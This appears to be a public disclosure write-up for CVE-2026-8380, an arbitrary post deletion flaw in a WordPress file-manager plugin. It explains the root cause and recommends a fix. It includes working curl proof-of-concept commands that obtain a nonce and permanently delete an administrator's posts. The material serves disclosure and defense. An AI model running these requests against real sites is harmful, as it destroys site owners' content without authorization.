Share
## https://sploitus.com/exploit?id=77AD3662-DD81-5869-B76F-3E6F84563F8E
# CVE-2026-8380

# CVE-2026-8380 โ€” Frontend File Manager <= 23.6 Arbitrary Post Deletion

## Overview

A critical authorization flaw was identified in the WordPress plugin **Frontend File Manager (nmedia-user-file-uploader)** affecting versions `<= 23.6`.

The vulnerability allows authenticated users with low privileges to permanently delete arbitrary WordPress posts, pages, attachments, and custom post types due to improper authorization validation in the AJAX deletion endpoint.

When the plugin option `_allow_guest_upload=yes` is enabled, the vulnerability becomes exploitable by unauthenticated attackers.

* **CVE:** CVE-2026-8380
* **Plugin:** Frontend File Manager (`nmedia-user-file-uploader`)
* **Affected Versions:** <= 23.6
* **Researcher:** Tiago Ferreira
* **CWE:** CWE-639 / CWE-862
* **Vulnerability Type:** Arbitrary Post Deletion
* **WPScan:** https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/

---

# Executive Summary

The plugin contains a critical authorization bypass vulnerability that allows arbitrary deletion of WordPress content through parameter mismatch validation inside the `wpfm_delete_file` AJAX action.

The vulnerability was successfully validated in a controlled laboratory environment with active Proof-of-Concept exploitation.

Additional security weaknesses were also identified during the research:

* CSRF in metadata update endpoints without nonce validation
* Extension allowlist bypass based only on the last file extension
* `_allow_guest_upload` disabling authorization checks in multiple endpoints
* Rate limiting based only on `REMOTE_ADDR`

---

# Vulnerable Endpoint

```http
POST /wp-admin/admin-ajax.php?action=wpfm_delete_file
```

### Affected File

```php
inc/files.php
```

### Vulnerable Code Region

```php
// inc/files.php:691
if( !$allow_guest && ! wpfm_is_current_user_post_author($_POST['file_id'] )) {
    wp_send_json_error(__("Sorry, not allowed", "wpfm"));
}

// inc/files.php:695
$file_ids = isset($_POST['file_ids']) && is_array($_POST['file_ids'])
            ? array_map('intval', $_POST['file_ids']) : [];

foreach ($file_ids as $file_id) {
    $file = new WPFM_File($file_id);

    wp_delete_post($file_id, $bypass_trash);
}
```

---

# Root Cause

The authorization check validates ownership using the singular parameter:

```php
$_POST['file_id']
```

However, the actual deletion operation iterates over a different parameter:

```php
$_POST['file_ids[]']
```

Because of this mismatch, an attacker can:

1. Provide a legitimate owned post in `file_id`
2. Inject arbitrary victim post IDs into `file_ids[]`

No validation exists to ensure:

* ownership of every item in `file_ids[]`
* allowed `post_type`
* relationship between `file_id` and `file_ids[]`

As a result, arbitrary WordPress content can be permanently deleted.

---

# Impact

An authenticated user with minimal privileges can permanently delete:

* Posts
* Pages
* Products
* Attachments
* Custom Post Types
* Plugin-specific content

The deletion is performed with:

```php
wp_delete_post($file_id, true);
```

Meaning content is permanently removed without Trash recovery.

If `_allow_guest_upload=yes` is enabled:

* exploitation becomes unauthenticated
* the author ownership check is entirely skipped

---

# Proof of Concept

## Laboratory Environment

* Target: `192.168.1.1:8080`
* Attacker Role: Subscriber
* Victim Role: Administrator

### Attacker Account

```text
wpfm_sub : Sub@Test123
```

### Victim Posts

```text
Page ID: 60
Post ID: 61
```

---

## Step 1 โ€” Obtain Nonce

The attacker visits a page containing the shortcode:

```text
[ffmwp]
```

Extract nonce:

```bash
curl -b sub_cookie http://target/wpfm-test/ | grep wpfm_ajax_nonce
```

Response:

```html
value="9c233d4720"
```

---

## Step 2 โ€” Trigger Arbitrary Deletion

```bash
curl -b sub_cookie -X POST http://target/wp-admin/admin-ajax.php \
    --data 'action=wpfm_delete_file' \
    --data 'wpfm_ajax_nonce=9c233d4720' \
    --data 'file_id=57' \
    --data 'file_ids[]=60' \
    --data 'file_ids[]=61'
```

### Explanation

| Parameter       | Description                                        |
| --------------- | -------------------------------------------------- |
| `file_id=57`    | Subscriber-owned post used to bypass authorization |
| `file_ids[]=60` | Victim administrator page                          |
| `file_ids[]=61` | Victim administrator post                          |

---

## Successful Response

```json
{
  "success": true,
  "data": {
    "message": "2 files, directories are removed inside SUB-OWNED"
  }
}
```

---

## Verification

```bash
curl -o /dev/null -w "%{http_code}\n" \
http://target/wp-json/wp/v2/pages/60
```

```text
404
```

```bash
curl -o /dev/null -w "%{http_code}\n" \
http://target/wp-json/wp/v2/posts/61
```

```text
404
```

---

# Severity

## Authenticated Scenario

### CVSS 3.1

```text
8.1 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
```

---

## Guest Upload Enabled Scenario

### CVSS 3.1

```text
9.1 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
```

---

# CWE Classification

* CWE-639 โ€” Authorization Bypass Through User-Controlled Key
* CWE-862 โ€” Missing Authorization

---

# Recommended Fix

Validate ownership and post type for every entry inside `file_ids[]`.

Example secure implementation:

```php
foreach ($file_ids as $fid) {

    if ( ! wpfm_is_current_user_post_author($fid) ) {
        wp_send_json_error(...);
    }

    if ( get_post_type($fid) !== 'wpfm-files' ) {
        wp_send_json_error(...);
    }
}
```

---

# Timeline

| Event                    | Date       |
| ------------------------ | ---------- |
| Vulnerability Discovered | 2026-05-28 |
| Vendor Contacted         | 2026-05-28 |
| WPScan Published         | 2026-06-04 |
| Public Disclosure        | 2026-06-18 |

---

# References

* WPScan Advisory:
  https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/

* CVE:
  https://vulners.com/cve/CVE-2026-8380

---

# Disclaimer

This research was performed in a controlled laboratory environment for educational and security research purposes only.

Do not test systems without proper authorization.